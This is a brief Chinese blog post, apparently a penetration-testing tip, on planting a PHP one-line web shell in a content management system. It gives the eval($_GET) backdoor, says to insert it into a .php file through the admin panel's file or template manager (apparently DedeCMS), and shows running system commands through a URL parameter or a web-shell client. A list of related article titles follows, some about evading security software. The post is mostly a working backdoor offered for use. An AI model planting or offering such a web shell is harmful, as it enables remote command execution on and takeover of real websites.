web渗透——PHP一句话插入
2017-10-20 10:26
211 查看
一句话:
<?php @eval($_GET['as']); ?> //as是形式参数位置:
1、模块——模块管理——文件管理器2、模板——模板管理——标签源码管理
3、、、
进入,选择.PHP文件,插入一句话
使用:
1、在网页上,、、、/dede/ad_add.php?as=system('dir'); //可以显示该目录下的文件、文件大小以及字节数2、利用工具(菜刀),可以详细浏览目录下的文件
相关文章推荐
- 渗透前期快速拿shell的捷径/Ewebeditor/ASP/ASPX/PHP各版本漏洞
- Web渗透:PHP字符编码绕过漏洞总结
- 如何用PHP把RDF内容插入Web站点之中(4)
- 如何用PHP把RDF内容插入Web站点之中(5)
- 如何用PHP把RDF内容插入Web站点之中(1)
- 如何用PHP把RDF内容插入Web站点之中(7)
- 如何用PHP把RDF内容插入Web站点之中(1)
- 如何用 PHP把RDF内容插入Web站点之中(3)
- 如何用PHP把RDF内容插入Web站点之中(3)
- 如何用 PHP把RDF内容插入Web站点之中(4)
- [WEB]绕过安全狗与360PHP一句话的编写
- 如何用PHP把RDF内容插入Web站点之中(6)
- 如何用PHP把RDF内容插入Web站点之中(2)
- 如何用 PHP把RDF内容插入Web站点之中(5)
- php web 信息采集
- ewebeditor 2.8 后台插上一句话
- asp,jsp,php等web开发必懂技术---什么时候使用静态页,什么时候必须使用动态页
- PHP判断客户端是PCweb端还是移动手机端方法
- PHP Web 2.0开发实战